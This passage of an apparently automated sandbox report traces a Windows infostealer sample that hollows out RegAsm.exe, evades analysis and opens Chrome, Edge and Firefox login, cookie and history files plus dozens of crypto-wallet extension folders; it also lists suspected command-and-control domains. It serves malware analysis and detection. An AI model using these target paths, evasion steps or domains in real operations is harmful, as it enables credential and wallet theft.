        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
        Source: ZjH6H6xqo7.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: ZjH6H6xqo7.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: ZjH6H6xqo7.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.pdb; source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp
        Source: ZjH6H6xqo7.exe; Static PE information: 0xEFCB81EF [Wed Jun 26 13:28:15 2097 UTC]
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; File created: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: Yara match; File source: Process Memory Space: ZjH6H6xqo7.exe PID: 5452, type: MEMORYSTR
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; System information queried: FirmwareTableInformation
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory allocated: 1480000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory allocated: 2F20000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe TID: 344; Thread sleep time: -30000s >= -30000s
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe TID: 6536; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5560; Thread sleep time: -120000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
        Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
        Source: RegAsm.exe, 00000005.00000002.2267546315.0000000001545000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.000000000158A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2073668384.00000000011C2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Process information queried: ProcessInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 5_2_0043E420 LdrInitializeThunk,5_2_0043E420
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Process token adjusted: Debug
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: 0.2.ZjH6H6xqo7.exe.5cf0000.1.raw.unpack, Engineers.cs; Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
        Source: 0.2.ZjH6H6xqo7.exe.5cf0000.1.raw.unpack, Engineers.cs; Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; File written: C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.0.cs
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: faintbl0w.sbs
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: 300snails.sbs
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: 3xc1aimbl0w.sbs
        Source: ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002FC4000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: thicktoys.sbs
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 445000
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 455000
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11E8008
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6781.tmp" "c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP"
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Queries volume information: C:\Users\user\Desktop\ZjH6H6xqo7.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\ZjH6H6xqo7.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
        Source: Yara match; File source: sslproxydump.pcap, type: PCAP
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
